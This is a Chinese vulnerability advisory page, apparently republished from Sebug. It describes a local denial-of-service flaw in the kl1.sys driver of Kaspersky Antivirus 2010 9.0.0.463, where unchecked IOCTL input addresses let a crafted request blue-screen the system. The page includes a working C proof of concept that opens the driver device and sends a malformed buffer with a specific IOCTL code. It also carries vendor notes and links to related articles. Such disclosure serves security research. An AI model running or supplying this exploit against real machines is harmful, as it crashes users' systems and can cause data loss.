影响版本: Kaspersky Labs Kaspersky Antivirus 2010 9.0.0.463

漏洞描述: BUGTRAQ  ID: 37044

Kaspersky Antivirus是非常流行的杀毒软件。

Kaspersky杀毒软件所使用的kl1.sys驱动没有检查IOCTL的输入地址，如果用户修改了一个或两个DWORD就可以触发异常，导致系统蓝屏死机。

<*参考  Heurs （heurs@ghostsinthstack.org） *>
测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

#include

#include

#include

#include

#include

int __cdecl main(int argc, char* argv[]) {     HANDLE hDevice = (HANDLE) 0xffffffff;     DWORD NombreByte;     DWORD Crashing[] = {          0x3ff8f44a, 0x9d4ad6c2, 0xd883673e, 0x0a06ac2a,          0x3d4552b1, 0x3b2f314e, 0xeb6dfc7e, 0xfcfdf961,          0xde0f4405, 0xaa76f8eb, 0x2dbc6ead, 0x534047f9,          0xb5ebadc5         };     BYTE Out[0x20];          printf("Local DoS - Kaspersky 2010 9.0.0.463nn");     hDevice = CreateFile("\\.\kimul25",GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXISTING,0,NULL);          DeviceIoControl(hDevice,0x0022c008,Crashing,sizeof(Crashing),Out,sizeof(Out),&NombreByte,NULL);          printf("Sploit Send.nhDevice = %xn", hDevice);     CloseHandle(hDevice);     getch();     return 0; } 

SEBUG安全建议:

厂商补丁：
Kaspersky Labs

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.kaspersky.com/

【编辑推荐】

1. Cisco IOS MSFC2 畸形二层帧远程拒绝服务安全缺陷
2. Sun OpenSolaris内核Panic远程拒绝服务漏洞
3. 谷歌发布Android安全漏洞补丁修复两个DoS漏洞

　　推荐阅读

　　微软发布严重Windows内核漏洞补丁

微软修复了Windows内核的一些严重级别的漏洞。攻击者可以利用这些漏洞来完全控制系统。专家称，内核漏洞属于最严重的漏洞，由于它们在Windows构架的更深一层，如果黑客攻击成功，他们将获取完全的系统控制权限。 　>>>详细阅读

本文标题：Kaspersky Anti-Virus kl1.sys驱动本地拒绝服务漏洞

地址：http://www.17bianji.com/anquan/buding/1486.html

 1/2    1